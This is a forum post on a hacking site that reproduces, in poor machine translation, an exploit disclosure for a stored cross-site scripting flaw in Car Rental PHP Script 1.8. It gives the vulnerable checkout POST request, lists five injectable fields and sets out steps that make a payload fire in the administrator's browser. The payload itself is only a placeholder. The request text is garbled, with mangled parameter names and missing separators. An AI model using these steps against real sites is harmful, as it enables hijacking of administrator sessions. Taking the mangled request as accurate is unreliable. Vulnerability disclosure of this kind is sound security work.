H

汽车出租脚本1.8-存储的跨站点脚本(XSS)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题:汽车租赁脚本1.8-存储的跨站点脚本(XSS)
#日期: 30/07/2023
#利用作者:饼干
#vendor: gz脚本
#供应商HomePage: https://gzscripts.com/
#软件link: https://gzscripts.com/car-rental-php-script.html
#版本: 1.8
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
发行说明:
允许攻击者将恶意代码注入网站,赋予窃取敏感的能力
信息,操纵数据并启动其他攻击。
##存储的XSS
----------------------------------------------------------------
post/eventbookingcalendar/load.php?controller=gzfrontaction=checkoutcid=1layout=calendarshow_header=tlocal=3 http/1.1
PEALDY_METHOD=PAY_ARRIVALEVENT_PRICES%5B51%5D=1EVENT_PRICES%5B50%5D=1EVENT_PRICES%5B49%5D=1Title=MRMALE=MRMALE=MALMALE=MALEFIRST_NAME=[XSS PAYLOLACH] second_name=[xss payloadload] PAYLOADMAIL=cracker%%40infosec.company=xxxaddress_1=[XSS PAYLOADADDRESS_2=XXXCITY=XXXSTATE=XXXZIP=XXXCCOUNTRITY=XXXCOUNTRITY=[XSS PAYLOADADDITIONAL
----------------------------------------------------------------
帖子参数“ first_name”很容易受到XSS的影响
帖子参数'second_name'很容易受到XSS的影响
发布参数“电话”很容易受到XSS的影响
帖子参数“ address_1”很容易受到XSS的影响
发布参数“国家”很容易受到XSS的影响
##复制步骤:
1。作为[访客用户]选择任何[拾取/返回位置]选择任何[时间] [租赁年龄] - 然后单击[搜索租车] - 选择任何汽车
2。将您的[XSS有效载荷]注入“名字”
3。将您的[XSS有效载荷]注入“姓氏”
4。在“手机”中注入您的[XSS有效载荷]
5。在“地址行1”中注入您的[XSS有效载荷]
6。在“国家”中注入您的[XSS有效载荷]
7.接受术语接受[预订]
XSS在本地用户浏览器上发射。
8。当管理员在此路径上的管理面板中访问[仪表板]时
XS会在他的浏览器上开火并执行
9.管理员访问[预订] - [所有预订]在此路径上检查[待预订](https://website/index.php?controller=gzbookingAction=index)
XS会在他的浏览器上开火并执行
 
后退
顶部